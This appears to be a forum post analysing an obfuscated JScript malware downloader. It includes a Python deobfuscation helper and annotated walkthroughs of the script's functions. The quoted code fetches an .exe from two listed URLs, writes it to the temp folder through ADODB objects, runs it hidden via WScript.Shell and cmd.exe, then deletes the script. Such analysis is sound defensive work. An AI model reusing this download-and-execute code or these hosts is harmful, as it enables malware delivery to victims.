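  * constant functions : var x=a; x=x+b; x=x/c; x=x-d  always hides a small integer.
The arithmetic inside J(...) is evaluated by a restricted walker, not by eval()."""
import ast
import operator
import re

# Only the four operators the script uses inside J(...) are allowed.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def safe_arith(expr: str) -> float:
    """Evaluate '+ - * /' over numeric literals; anything else is rejected."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported syntax in {expr!r}")
    return walk(ast.parse(expr, mode="eval"))


def j_value(arg: str) -> str:
    """One J(arg) call: String.fromCharCode(arg + 1)."""
    v = safe_arith(arg)
    if v != int(v):
        raise ValueError(f"J({arg}) does not yield an integer: {v}")
    return chr(int(v) + 1)


_J_CALL = re.compile(r"J\(([^()]*)\)")


def resolve_j_chain(expr: str) -> str:
    """Turn 'J(783/9+0)+J(1044-966)+...' into the string it builds."""
    parts = _J_CALL.findall(expr)
    leftover = _J_CALL.sub("", expr).replace("+", "").strip()
    if not parts or leftover:
        raise ValueError("expression is not a pure chain of J() calls")
    return "".join(j_value(p) for p in parts)


def resolve_constant(a: int, b: int, c: int, d: int) -> float:
    """The script's 4-step constant functions: (a + b) / c - d."""
    return (a + b) / c - d


# Matches the 'var x=a; var y=x+b; var z=y/c; var w=z-d;' body, spaces optional.
_CONST_FN = re.compile(
    r"var\s+\w+\s*=\s*(\d+)\s*;\s*var\s+\w+\s*=\s*\w+\s*\+\s*(\d+)\s*;\s*"
    r"var\s+\w+\s*=\s*\w+\s*/\s*(\d+)\s*;\s*var\s+\w+\s*=\s*\w+\s*-\s*(\d+)\s*;")


def resolve_constant_source(src: str) -> float:
    """Find the (a+b)/c-d pattern in a function body and return the hidden value."""
    m = _CONST_FN.search(src)
    if m is None:
        raise ValueError("no (a+b)/c-d constant pattern found")
    return resolve_constant(*(int(x) for x in m.groups()))


if __name__ == "__main__":
    # Expressions copied from the analysed script (quoted in this post).
    print(resolve_j_chain("J(783/9+0)+J(1044-966)+J(97)+J(96+9)+J(8600/86+0)+J(14*7)+J(53+62)"))
    print(resolve_constant(412883, 43957, 405, 928))   # haS in htU(): expected HTTP status
```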

Let's see again the function call by the if from the main part :

function qdI()
{

var Uh = eval("ActiveXObject");
var Rl = new Uh(oh());

=> new ActiveXObject("ADODB.Stream")
=> create a Stream object
var WuR="";

WuR=WuR+J(551-435)+J(109)+J(161-55)+J(418-309)+J(10*11)+J(1043-925)+J(229-120);

=> now, we know what J(value) does !

=> the values are not put in clear, but as operations
=> J(116)+J(109)+J(106)+J(109)+J(110)+J(118)+J(109);
=> values : 116, 109, 106, 109, 110, 118, 109
=> char codes : 117, 110, 107, 110, 111, 119, 110
=> "u" + "n" + "k" + "n" + "o" + "w" + "n" (with ALT+code)
=> WuR = "unknown"
var XkB = WuR;

=> "unknown"
var oQ = (typeof Rl[CWZ()] == XkB);

=> CWZ() => YA()+Imt()

=> YA() => vq()+Hk()
=> vq() => J(35+31) : "C"
=> Hk() => J(302-195) : "l"
=> Imt() => BP()+VUd()

=> BP() => VNo() => "o"

=> VUd() => sI()+uKr()

=> sI() => J(6*19) : "s"
=> uKr() => J(348-248) : "e"
=> var oQ = (typeof Stream["Close"] == "unknown")

=> returns a boolean (true or false)

=> test if typeof stream.Close is "unknown" (in JScript, typeof on a member of an ActiveX object returns "unknown")
=> here : oQ is always true !
if (!oQ) return oQ;

=> if oQ is false (typeof was not "unknown") : return false
=> will never be used, because we have just seen oQ is always true here
oQ = (typeof Rl[tDk()] == XkB);
=> same method as CWZ() : functions / sub-functions

=> tDk() => "Position"
=> test if typeof stream.Position is "unknown"
=> oQ always true
return oQ;
}
Here this function always returns true, because the type reported is always "unknown" (when running in the expected environment).

Remark : on the other sample : начисления_xls.js (see at the end of this post)

The Boolean true or false is the result of one test :

var E = (typeof QWi[iHx()] == "object");
=> typeof object_recordset_fields

=> returns "object" (and not "unknown") when running in the expected environment :D
2-4) The main function gW(URL) :

nof = gW(Tib[Ta]);

=> Tib[Ta] : current URL (Ta will be 0 or 1)

The script stops if :

- one of these URLs worked and the payload has been run,
- none of these URLs worked
- errors occurred for each URL or step (false returned)

function gW(qnI)
{

var cd = htU(qnI);
if (!cd)
throw cd;
return cd;
}

=> htU(qnI)

- downloads the payload from URL that is given as parameter : qnI
- saves it on the HDD
- runs it

function htU(Tib)
{

var nGi="";
nGi=nGi+J(783/9+0)+J(1044-966)+J(97)+J(96+9)+J(8600/86+0)+J(14*7)+J(53+62);


=> "XObject"
var Pt = jH(nGi);

=> Pt = the ActiveXObject constructor (built from "Active" + "XObject"), not the string "ActiveXObject" !
var yb = DN(Pt);
function DN(ayd)
{
var wC = new ayd(QRO("144B501D5E32151C2758215D16","C83o7Ba2t0D1zn3tfqUcMUag2g8hwJlsWgdXjD9rtYWDbxF2uQrnf64sJOKWzGaqgAj8716EyG"));
=> new ActiveXObject("Wscript.Shell")
return wC;
}
=> new ActiveXObject("Wscript.Shell")
=> shell object : for the run part (see below)
var dwe = YjS(Pt);
function YjS(GgD)
{

var wC = new GgD(QRO("35232A193A6A6C0107742C333529","xprTvXBYJ8dgay32zvNLN6fbbvJp1XV6w4U5BuhZ4MyPZyDCytLJ8Ls0WrItDcADtEzeOiEKgUjKGhcs"));
=> new ActiveXObject("MSXML2.XMLHTTP")
return wC;
}
=> new ActiveXObject("MSXML2.XMLHTTP")
=> http object for the request
var bC=[];
bC[0]="emO";
bC[1]="ile";
bC[2]="in";
bC[3]="ect";
bC[4]="st";
bC[5]="bj";
bC[6]="g";
bC[7]="Sy";
bC[8]="ipt";
bC[9]="Scr";
bC[10]=".F";
var npT=bC[9]+bC[8]+bC[2]+bC[6]+bC[10]+bC[1]+bC[7]+bC[4]+bC[0]+bC[5]+bC[3];

=> "Scripting.FileSystemObject"
var dSF = new Pt(npT);

=> new ActiveXObject("Scripting.FileSystemObject")

=> FSO object to manipulate the files / folder / path
if (jGP(dwe, Tib) == 0)
=> try to retrieve the data from the URL
=> parameters : the http object to make the request, and the URL
function jGP(OF, qnI)
{

var mD=[];
mD[0]="5o";
mD[1]="aL";
mD[2]="R";
mD[3]="R";
mD[4]="b0K";
mD[5]="gh";
mD[6]="mC";
mD[7]="qdn";
mD[8]="L9p";
mD[9]="A";
mD[10]="WKH";
mD[11]="Au";
mD[12]="yn";
mD[13]="7";
mD[14]="b";
mD[15]="70";
mD[16]="eW";
mD[17]="e75";
mD[18]="mY";
mD[19]="qK";
mD[20]="ZZH";
mD[21]="h3";
mD[22]="I";
mD[23]="f";
mD[24]="8D";
mD[25]="hLx";
mD[26]="48i";
mD[27]="P";
mD[28]="mhZ";
mD[29]="seO";
mD[30]="N";
mD[31]="s";
mD[32]="s";
mD[33]="kcI";
mD[34]="U9N";
mD[35]="fyP";
var JnJ=mD[28]+mD[21]+mD[19]+mD[8]+mD[5]+mD[10]+mD[6]+mD[1]+mD[15]+mD[12]+mD[18]+mD[32]+mD[25]+mD[13]+mD[26]+mD[14]+mD[23]+mD[16]+mD[24]+mD[0]+mD[33]+mD[17]+mD[20]+mD[29]+mD[7]+mD[2]+mD[31]+mD[34]+mD[30]+mD[35]+mD[27]+mD[11]+mD[4]+mD[22]+mD[9]+mD[3];

=> password_1 : key for the XOR part "mhZh3qKL9pghWKHmCaL70ynmYshLx748ibfeW8D5okcIe75ZZHseOqdnRsU9NNfyPPAub0KIAR"
var Cpn="";
Cpn=Cpn+J(825-771)+J(24*3)+J(10230/93-0)+J(45+55)+J(922-846)+J(7*11)+J(53)+J(824-722)+J(244-127)+J(4*13)+J(85-38)+J(336-228)+J(2244/22+0)+J(3+86)+J(4*19)+J(32*2)+J(3*17)+J(2616/24+0)+J(5*11)+J(182-96)+J(4048/46+0)+J(327-256)+J(2349/29+0)+J(793-697)+J(10764/92+0)+J(55+32)+J(67)+J(713-629)+J(3648/48-0)+J(10*7)+J(89)+J(367-319)+J(262-184)+J(8*7)+J(1188/22+0)+J(25+92)+J(7*7)+J(334-269)+J(16*5)+J(2231/23-0)+J(3*17)+J(72+3)+J(116/1+0)+J(6375/85+0)+J(4225/65-0)+J(315-198)+J(707-634)+J(1825/25-0)+J(907-803)+J(3213/63-0)+J(7110/90+0)+J(586-532)+J(875-767)+J(4446/39-0)+J(387-290)+J(38+68)+J(8+90)+J(53)+J(886-767)+J(2380/35-0)+J(108+1)+J(5664/59-0)+J(46+70)+J(4757/67-0)+J(2773/59-0)+J(360/3-0)+J(7*11)+J(400/4-0)+J(90+10)+J(266-159)+J(70+14)+J(741-661)+J(8*7)+J(550/5-0)+J(51+70);

=> password_2 : key for the XOR part "7IoeMN6gv50mgZMA4n8WYHRavXDUMGZ1O97v2BQb4LuLBvJJi4P7msbkc6xEnauH0yNeelUQ9oz"
var tkc=207953;
var aJJ=tkc+19575;
var CF=aJJ/476;
var xgH=CF-478;

OF[QRO("02183F06",JnJ)](QRO("700C3B",Cpn), qnI, xgH);

=> http["open"]("GET", "http ://www .interlaan.com/deklar_11222016.exe", 0)
=> xgH = 0 : the third parameter (async) is false, so the request is synchronous
try {
OF[QRO("1B202D53","hEC7c7RW7l7RcuyQeaHB1yOcRt8hth0hzTpnWp54znW0WJrFDAdcAnUJe5ud6Lag2oK0ud")]();

=> http["send"]()
=> http.send()
=> send the request !
} catch (WKY) {
return 0;
}
return 1;
}
return false;

var cOv="";
cOv=cOv+J(41*2)+J(9+106)+J(1536/16+0)+J(693-578)+J(11136/96+0)+J(912/8+0);

=> "Status"
var sn = dwe[cOv];

=> http.status
var Xdq=412883;
var leM=Xdq+43957;
var Gcb=leM/405;
var NC=Gcb-928;

var haS = NC;

=> haS = 200 => When the request is OK (HTTP_OK)
if (sn == haS) {

=> sn == 200 ?
=>if true : the following part is run
var IxV="";
IxV=IxV+J(448/7-0)+J(67)+J(648-570)+J(67)+J(5*13)+J(4+41)+J(41*2)+J(5*23)+J(432-319)+J(84+16)+J(32*3)+J(490-382);

=> "ADODB.Stream"
var gib = new Pt(IxV);

=> new ActiveXObject( "ADODB.Stream")
=> create a stream object, to handle the data received
var SW = VNB(dSF);

=> calls the VNB function with the FileSystemObject as parameter
=> returns the path to be used :
=> Example : "C:\\Users\\DardiM\\AppData\\Local\\Temp\\radDFC2C.tmp"

The function uses 128["charAt"](256) to make an error occur and redirect the script to the catch part, that is the part meant to deal with errors. But here normal code is inside this part.
=> it tries to read the char at index 256 inside the number 128... hahaha :rolleyes:
Code:
function VNB(AK)
{
    var kO=118956;
    var ApS=kO+55044;
    var ELV=ApS/580;
    var htB=ELV-172;
    var LPh = htB;
    var UuE="";
    UuE=UuE+J(109)+J(1650/15-0)+J(5*23);
    => "not"
 
    var xw = UuE;
    try
    {
        var ux="";
        ux=ux+J(7*13);
        => "\\"
 
        var KUe="";
        KUe=KUe+J(10*7)+J(419-319)+J(5*23)+J(684-601)+J(20*5)+J(657-549)+J(321-210)+J(784-707)+J(32*3)+J(6480/60-0)+J(1500/15+0);

        => "GetTempName"
 
        xw = ux + AK[KUe]();

        => "\\radDFC2C.tmp"
 
        var xZz="";
        xZz=xZz+J(452-354)+J(284-181)+J(32*3)+J(97+16)+J(1408/22-0)+J(5*23);

        => "charAt"
 
        var Pz=660305;
        var Rlj=Pz+62830;
        var pgJ=Rlj/679;
        var eSw=pgJ-809;
        xw = xw + LPh[xZz](eSw);

        => generate an error : LPh[xZz](eSw) : 128["charAt"](256)
                     
        // never used parts
        var Yv="";
        Yv=Yv+J(136/2-0)+J(716-618)+J(63+40)+J(577-467);
        =>              
        var VUK=[];
        VUK[0]="d3";
        VUK[1]="dah";
        VUK[2]="s";
        VUK[3]="h";
        VUK[4]="663";
        VUK[5]="asg";
        VUK[6]="g";
        VUK[7]="dh";
        var Sq=VUK[7]+VUK[5]+VUK[3]+VUK[0]+VUK[4]+VUK[6]+VUK[1]+VUK[2];
        => "dh" + "asg" + "h" + "d3" + "663" + "g" + "dah" + "s"
        => no "mean"
 
        WScript[Yv](Sq);
    }
    catch (Ms)
    {
    => the error that is made voluntarily make the script reaches here
 
        var rd="";
        rd=rd+J(742-676)+J(271-158)+J(16+84)+J(82+14)+J(75+40)+J(3800/38-0)+J(67+11)+J(8+89)+J(15*7)+J(539-439)+J(392/4+0)+J(4600/40+0);

        => "CreateObject"
 
        var rOs="";
        rOs=rOs+J(40+46)+J(4+78)+J(9310/95-0)+J(495-382)+J(70+34)+J(3*37)+J(34+81)+J(9*5)+J(64+13)+J(48+52)+J(5*23)+J(59*2)+J(143-33)+J(2034/18-0)+J(954/9-0);

        => "WScript.Network"
 
        var OxT = WScript[rd](rOs);

        => WScript.CreateObject("WScript.Network")
 
        var CFm="";
        CFm=CFm+J(12*7)+J(3192/28+0)+J(33+67)+J(683-570)+J(65+2)+J(27+83)+J(9396/87+0)+J(3648/38-0)+J(446-342)+J(109);

        => "UserDomain"
 
        var Wl = typeof OxT[CFm];

        => get user domain : "DESKTOP-DARDIMPC"
 
        var uL="";
        uL=uL+J(860-746)+J(2530/22+0)+J(113)+J(8*13)+J(109)+J(9384/92-0);

        => "string"
 
        var KDf = uL;
        if (Wl == KDf)
        {
        =>  two Strings ?
 
            var rC=55817;
            var EZO=rC+11587;
            var BN=EZO/82;
            var SC=BN-819;
            var JeR = SC;
            var kP="";
            kP=kP+J(747-677)+J(8700/87-0)+J(5*23)+J(41*2)+J(837-726)+J(20*5)+J(14*7)+J(5720/55+0)+J(32*3)+J(107)+J(759/11-0)+J(102+8)+J(94+13)+J(2+97)+J(20*5)+J(113);

            => "GetSpecialFolder"
 
            var acD=607;
            var lru=acD+3401;
            var NK=lru/4;
            var IW=NK-1000;
            xw = AK[kP](IW) + xw;
 
            => "C:\\Users\\DardiM\\AppData\\Local\\Temp\\radDFC2C.tmp"
        }
        else
        {
            var gA=472398;
            var nh=gA+23328;
            var dU=nh/518;
            var rkq=dU-947;
            var JeR = rkq;
            var CU=[];
            CU[0]="S";
            CU[1]="pec";
            CU[2]="Get";
            CU[3]="e";
            CU[4]="r";
            CU[5]="F";
            CU[6]="old";
            CU[7]="ial";
            var di=CU[2]+CU[0]+CU[1]+CU[7]+CU[5]+CU[6]+CU[3]+CU[4];

            => "GetSpecialFolder"
 
            var bDo=254595;
            var hxj=bDo+51425;
            var IkN=hxj/535;
            var fg=IkN-571;
            xw = AK[di](fg) + xw;
        }
    }
    return xw;
}
var qU="";
qU=qU+J(70+8)+J(42+69)+J(2400/24-0)+J(109);

=> "Open"
gib[qU]();

=> stream["Open"]()
=> stream.Open()
=> opens the stream object, to be able to use it
var cY="";
cY=cY+J(83)+J(24*5)+J(4884/44+0)+J(43+57);

=> "Type"
var MzJ=13231;
var hZ=MzJ+16865;
var CAg=hZ/48;
var By=CAg-626;
gib[cY] = By;

=> stream["Type"] = 1 : binary data : the data that will put inside will be considered as binary data
var yu="";
yu=yu+J(54+27)+J(20*5)+J(6*19)+J(7881/71-0)+J(10*11)+J(8720/80-0)+J(11+103)+J(1600/16+0)+J(275-210)+J(75+35)+J(9*11)+J(27+93);

=> "ResponseBody"
var yzh = dwe[yu];

=> var yzh = http.ResponseBody
=> Array of bytes with the data received from the http request
var DZy="";
DZy=DZy+J(43*2)+J(923-810)+J(8*13)+J(94+21)+J(20*5);

=> "write"
gib[DZy](yzh);

=> stream["write"](yzh)
=> writes in the stream object the data received (temporary saved on yzh var)
var Am="";
Am=Am+J(69+10)+J(33+77)+J(6156/54-0)+J(89+15)+J(25+90)+J(416/4+0)+J(90+20)+J(109);

=> "Position"
var lm=260605;
var YU=lm+50275;
var Ny=YU/580;
var LC=Ny-536;

=> LC= 0
gib[Am] = LC;

=> stream["position"] = 0
=> after the call of the write, the position has changed : set to 0
if (!WN(gib, SW, Pt))
=> calls a function that try to save the data on a file
=> WN(stream , PATH, ActiveXObject)
return false;

Details of WN function :

Uses an "ADODB.Recordset" object :

The ADO Recordset object is used to hold a set of records from a database table. A Recordset object consist of records and columns (fields).

details : ADO Recordset Object
- adds the data from the stream object to the record, and reads the data from the record, to get the size
(this method can be used to convert a data type, but here, the data received are put on a stream with data type : binary => no changes)
Finally saves the data to a file ( random name using GetTempName) :
Example : "C:\Users\DardiM\AppData\Local\Temp\radDFC2C.tmp"
Code:
function WN(gV, Jp, LAe) // Stream, "C:\\Users\\DardiM\\AppData\\Local\\Temp\\radDFC2C.tmp", ActiveXObject
{
    var TOw=376387;
    var LH=TOw+46238;
    var XCe=LH/735;
    var sM=XCe-565;
    var DC = sM;

    var Qbv="";
    Qbv=Qbv+J(605-524)+J(89+11)+J(960/10+0)+J(4356/44+0);

    => "Read"
 
    var Ld = gV[Qbv]();

    => Stream.Read()
    => array of bytes : payload binary data
 
    var tv="";
    tv=tv+J(232-150)+J(9152/88-0)+J(728-607)+J(898-798);

    => "Size"
 
    var Hx = gV[tv];

    => Stream.size => size written : 924410
 
    var bP=444811;
    var NUC=bP+14609;
    var nPH=NUC/620;
    var NoG=nPH-540;
    var etf = NoG;
    var rx="";
    rx=rx+J(832/13-0)+J(547-480)+J(6*13)+J(6633/99-0)+J(5*13)+J(6+39)+J(1701/21+0)+J(2000/20+0)+J(8624/88+0)+J(10*11)+J(88+25)+J(9+90)+J(44+70)+J(7500/75-0)+J(10120/88-0);

           => "ADODB.Recordset"

          =>  see : https://msdn.microsoft.com/en-us/library/ms681510(v=vs.85).aspx
 
    var SFa = new LAe(rx);

    => new ActiveXObject("ADODB.Recordset")
 
    var SfA="";
    SfA=SfA+J(27+70)+J(8*13)+J(76+33);

    => "bin"
                                  
    var OB = SfA;
    var PbB="";
    PbB=PbB+J(101)+J(428-324)+J(4500/45+0)+J(107)+J(0+99)+J(6*19);

    => "fields"
 
    var Yb="";
    Yb=Yb+J(32*3)+J(11100/100+0)+J(32+79)+J(27+73)+J(65+44)+J(355-256);

    => "append"
 
    SFa[PbB][Yb](OB, etf, Hx);

    => Recordset Object
    => Recordset["fields"]["append"]("bin",201,924410)
    => Type 201 : adLongVarChar (Memo / Hyperlink in Access 97, Text)
 
    var CFg="";
    CFg=CFg+J(59+51)+J(3*37)+J(20*5)+J(109);

    => "open"
 
    SFa[CFg]();

    => Recordset["open"]
 
    var ZJ="";
    ZJ=ZJ+J(350-254)+J(738-639)+J(9*11)+J(7*11)+J(589-489)+J(15+103);

    => "addNew"
    => After you call the AddNew method, the new record becomes the current record and remains current after you call the Update method.
 
    SFa["addNew"]();
 
    var XmR="";
    XmR=XmR+J(72+24)+J(340-229)+J(6882/62-0)+J(128-28)+J(71+38)+J(541-442)+J(60+6)+J(25+78)+J(4*29)+J(109)+J(53*2);

    => "appendChunk"
 
    SFa(OB)[XmR](Ld);
    => Recordset("bin")["appendChunk"](stream)

    => Appends data to a large text or binary data Field, or to a Parameter object.
    => the binary data received : payload
 
    var BC="";
    BC=BC+J(72+44)+J(757-646)+J(8712/88-0)+J(429-333)+J(786-671)+J(7400/74-0);

    => "update"
 
    SFa[BC]();
    var LvZ="";
    LvZ=LvZ+J(9*13)+J(32*3)+J(397-290)+J(950-834)+J(20*5);
 
    => "value"
 
    Ld = SFa(OB)[LvZ];
 
    => retrieve the "bin" value : the data     
    => RS.bin["value"]
 
    var wJ="";
    wJ=wJ+J(214/2-0)+J(20*5)+J(995-886)+J(33+69)+J(5*23)+J(2+101);
 
    => "length"
 
    var Coz = Ld[wJ];
    
    => retrieve the length of the data

    if (Coz > DC)
    => 924410 > 10
    {
        var los="";
        los=los+J(75+7)+J(576/6+0)+J(9*13)+J(50+50)+J(83)+J(68+42)+J(222-153)+J(611-507)+J(107)+J(302-202);

        => "SaveToFile"
 
        gV[los](Jp);

        => Stream["SaveToFile"](jp)

=> Example : ("C:\\Users\\DardiM\\AppData\\Local\\Temp\\radDFC2C.tmp")
 
        return true;
    }
    else return false;
}

var iSG="";
iSG=iSG+J(6*11)+J(1087-980)+J(5060/46-0)+J(645-531)+J(699-599);

=> "Close"
gib[iSG]();

=> stream["Close"]()
=> stream.close()
=> close the stream object (this object has done its job : closed)
var Ep="";
Ep=Ep+J(3626/37-0)+J(1108-1000)+J(44+55)+J(2475/55+0)+J(23+77)+J(5355/45+0)+J(2100/21-0)+J(21+10)+J(3036/66-0)+J(2548/26-0)+J(1984/64-0);

=> "cmd.exe /c "
var ZzY = Ep + SW;
var ybc=118986;
var NI=ybc+11627;
var fi=NI/397;
var UF=fi-329;
var IIZ = UF;
var Vp=[];
Vp[0]="y7a";
Vp[1]="nd";
Vp[2]="sjh";
Vp[3]="gfs";
Vp[4]="qm";
Vp[5]="dh";
Vp[6]="as";
Vp[7]="fs";
var Jdv=Vp[6]+Vp[4]+Vp[1]+Vp[2]+Vp[0]+Vp[3]+Vp[5]+Vp[7];

=> "asqmndsjhy7agfsdhfs"
var ft="";
ft=ft+J(920-872)+J(5+43)+J(4214/86-0)+J(10*5);

=> "1123"
IIZ = ygJ(Jdv, Pt, ZzY, ft);

function ygJ(ng, LAe, tC, xnW)
{

var JC="";
JC=JC+J(4066/38+0)+J(93+7)+J(3488/32+0)+J(4386/43-0)+J(5*23)+J(94+9);

=> "length"

var iSL = ng[JC];

=> length of "asqmndsjhy7agfsdhfs"

var Jnf=279668;
var EQQ=Jnf+15258;
var HB=EQQ/478;
var ubH=HB-610;
var dUR = ubH;
var sDM=402607;
var Ko=sDM+39011;
var RI=Ko/827;
var tU=RI-529;
var Nk = tU;
var CWg = xnW;
if (iSL == dUR) => 19 == 7
{

var iUx="";
iUx=iUx+J(416-303)+J(774-658)+J(6213/57+0);

=> "run"
CWg = iUx;
}
if (iSL == Nk) => 19 == 5
{

var FL = iSL * Nk;

=> 25
return JK(FL, LAe, tC, xnW);

=> end of recursive calls !
=> calls another function (I will show it below)
}
var NW="";
NW=NW+J(605-491)+J(942-826)+J(97)+J(456/4-0)+J(9775/85-0)+J(113)+J(7592/73-0)+J(804-695)+J(20+82);

=> "substring"
var BY=250521;
var FPm=BY+40485;
var kA=FPm/317;
var pHz=kA-918;
var zD=1065;
var em=zD+11871;
var fx=em/616;
var Tk=fx-20;
var jXy = ng[NW](pHz, iSL - Tk);

=>"asqmndsjhy7agfsdhfs".substring(0, 19 - 1 )
return ygJ(jXy, LAe, tC, CWg);

=> "asqmndsjhy7agfsdhf"
=> ActiveXObject
=> "cmd.exe /c C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad36D41.tmp" => "1123"

=> recursive calls !
}
=> A RECURSIVE FUNCTION
=> this big function calls itself several times until some values are reached
=> the big string is modified at each call

"asqmndsjhy7agfsdhfs"
"asqmndsjhy7agfsdhf"
"asqmndsjhy7agfsdh"
"asqmndsjhy7agfs"
"asqmndsjhy7agf"
...
...
"asqmnds"

=> then it uses some real part

if (iSL == dUR) => iSL == 7
{

var iUx="";
iUx=iUx+J(416-303)+J(774-658)+J(6213/57+0);

=> "run"

CWg = iUx;
}
"asqmn"

=> then it uses some real part
if (iSL == Nk) => iSL == 5
{

var FL = iSL * Nk;
=> 25
return JK(FL, LAe, tC, xnW);

- parameter 1 : 25
- parameter 2 : ActiveXObject
- parameter 3 : command line

=> Example : "cmd.exe /c C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad36D41.tmp"
- parameter 4 : "run"
=> the real returns ! recursive calls ended
}
Let's see JK function :
....................

function JK(rch, LAe, tC, xnW)
{

var xUj=85687;
var oEC=xUj+61733;
var se=oEC/364;
var hP=se-405;
var saL = hP;

=> saL = 0 : ((85687+61733) / 364) - 405
if (rch > saL) => always true : 25 > 0
{
rch = saL;

=> rch = 0 : intWindowStyle that will be used for the run part, second parameter
=> to hide the window
}
var XJ = QRO("32290802101215242C1D01","ANlhxsfCDykvurcqjY4RRqr9m5mh5FlojeGYDzFGG37989hSeNYp8K699X6IbQAe945t6BVJfyf74i");

=> "sgdjhasghdj"

var GNY="";
GNY=GNY+J(810-712)+J(25+28)+J(9*13)+J(7*17)+J(3230/38-0)+J(1073-991)+J(16*5)+J(8228/68+0)+J(595-493)+J(253-149)+J(706-655)+J(76+33)+J(6180/60-0)+J(16*3)+J(10*5)+J(7+45)+J(747-648)+J(489-407)+J(4200/42+0)+J(7584/96-0)+J(162-113)+J(1+64)+J(1060-958)+J(40+41)+J(239-136)+J(45+21)+J(1079-975)+J(16*7)+J(7280/70-0)+J(7+62)+J(63+17)+J(101)+J(3744/78-0)+J(279-201)+J(1072-972)+J(543-461)+J(5253/51-0)+J(409-306)+J(87-10)+J(1054-939)+J(71)+J(32+32)+J(5310/45-0)+J(20+55)+J(823-713)+J(866-762)+J(637-524)+J(5700/75-0)+J(234-164)+J(26+27)+J(73)+J(5412/66-0)+J(29+57)+J(634-533)+J(3*37)+J(47)+J(4250/50+0)+J(481-375)+J(10*5)+J(10*7)+J(65+46)+J(6902/58+0)+J(7*17)+J(632-566)+J(3685/55-0)+J(21+35)+J(231-164)+J(82+27)+J(5106/69+0)+J(741-633)+J(52+2);

=> "c6vxVSQzgi4nh135dSeP2BgRhCiqiFQf1OeShhNtHAwLoirMG6JSWfp0Vk3GpxxCD9DnKm7"

XJ = new LAe(QRO("3445150A3F2325543401510204",GNY));
=> uses the QRO function (decoder)
=> new ActiveXObject("Wscript.Shell")

XJ[xnW](tC, rch);

=> xnW = "run"
=> rch = 0 : hide the window (and activate another)
=> Shell.run (command line, 0)
=> run the payload
var ez=2842;
var DDn=ez+749;
var gm=DDn/21;
var ihg=gm-163;
var xw = ihg;
return xw;

=> always returns 8 !!!
}
var gL=146016;
var anP=gL+63364;
var qXw=anP/361;
var mlA=qXw-570;
var qvO = mlA;

=> 10 : ((146016+63364)/361) - 570
if (IIZ < qvO)

=> here, IIZ is always equal to 8 and qvO equal to 10

{
return BSu(dSF);

=> deletes the current running script file

function BSu(WZr, Svj) => 2nd parameter unused
{
var Xh=[];
Xh[0]="M";
Xh[1]="9";
Xh[2]="fxj";
Xh[3]="E";
Xh[4]="4";
Xh[5]="OZ";
Xh[6]="3";
Xh[7]="ZE";
Xh[8]="9i";
Xh[9]="hj";
Xh[10]="e0S";
Xh[11]="g";
Xh[12]="ml";
Xh[13]="Ad9";
Xh[14]="5X";
Xh[15]="J";
Xh[16]="U";
Xh[17]="rb";
Xh[18]="7oZ";
Xh[19]="3e";
Xh[20]="yr7";
Xh[21]="ug";
Xh[22]="Ux";
Xh[23]="s";
Xh[24]="3f2";
Xh[25]="s4";
Xh[26]="u";
Xh[27]="Jj";
Xh[28]="noU";
Xh[29]="KLh";
Xh[30]="lbO";
Xh[31]="E";
Xh[32]="w";
Xh[33]="t";
Xh[34]="rJ";
Xh[35]="3L";
Xh[36]="V";
Xh[37]="3g";
Xh[38]="5T";
Xh[39]="Kn";
Xh[40]="m";
Xh[41]="1Wl";
var ms=Xh[22]+Xh[0]+Xh[4]+Xh[19]+Xh[28]+Xh[8]+Xh[10]+Xh[37]+Xh[3]+Xh[38]+Xh[36]+Xh[5]+Xh[27]+Xh[17]+Xh[1]+Xh[35]+Xh[31]+Xh[11]+Xh[20]+Xh[16]+Xh[21]+Xh[26]+Xh[30]+Xh[7]+Xh[2]+Xh[32]+Xh[29]+Xh[12]+Xh[14]+Xh[18]+Xh[34]+Xh[25]+Xh[15]+Xh[40]+Xh[41]+Xh[6]+Xh[9]+Xh[24]+Xh[39]+Xh[13]+Xh[23]+Xh[33];


=>"UxM43enoU9ie0S3gE5TVOZJjrb93LEgyr7UugulbOZEfxjwKLhml5X7oZrJs4Jm1Wl3hj3f2KnAd9st"
var LN = eval(QRO("022B2E465A151A",ms));

=> QRO => eval("WScript")
=> LN : WScript
var kQ = LN[QRO("303A085F124D03232E200451065D","cYz6b9EVBLJ0k8wposUSED3bw02Cp6bI71mjcMnF7UfKxD6eFo6FO0VMpgcaENpyl8U5EdriaX0jZ")];

=> "ScriptFullName"
=> WScript["ScriptFullName"]
=> "J:\\ANALISE\\23-11-2016#20 (1)\\Документы и декларация на товар 11222016.js"
var EB="";
EB=EB+J(557-440)+J(8036/98-0)+J(6630/65+0)+J(28+70)+J(1+55)+J(9752/92-0)+J(2795/43+0)+J(49+72)+J(38+42)+J(26+93)+J(757-660)+J(10*7)+J(73)+J(2+52)+J(5184/64-0)+J(944-892)+J(2544/48-0)+J(79)+J(6783/57+0)+J(4620/70+0)+J(10+55)+J(7*11)+J(324-250)+J(1173/23-0)+J(7*17)+J(4+100)+J(579-478)+J(48+16)+J(35+65)+J(6351/73-0)+J(3552/37-0)+J(420-341)+J(852-750)+J(35+39)+J(6*17)+J(15*7)+J(213-113)+J(7*17)+J(3+61)+J(109)+J(1024-936)+J(37+30)+J(8*7)+J(10*7)+J(6*11)+J(83)+J(4*19)+J(9*11)+J(455/7+0)+J(21+80)+J(65+44)+J(90+15)+J(78+7)+J(4*17)+J(109)+J(16*3)+J(2*37)+J(8+70)+J(192/2+0)+J(76+24)+J(1488/31-0)+J(47)+J(929-881)+J(8200/100+0)+J(21+32)+J(6*11)+J(8*13)+J(73)+J(31+74)+J(9630/90+0)+J(490-383);

=> "vSgc9kBzQxbGJ7R56PxCBNK4xifAeXaPgKgjexAnYD9GCTMdBfnjVEn1KOae101S6CiJjll"
WZr[QRO("12360B064D0E04133D1D",EB)](kQ);
=> Shell["deleteFile"]("J:\\ANALISE\\23-11-2016#20 (1)\\Документы и декларация на товар 11222016.js")
return true;
}
}
else
{

return false;
}

}
else {
return false;
}
return true;
}
3) Conclusion :

- very big puzzle games :D

Документы и декларация на товар 11222016.js

URLs :

- http ://www .interlaan.com/deklar_11222016.exe
- http ://dipudevaraj.com/deklar_11222016.exe
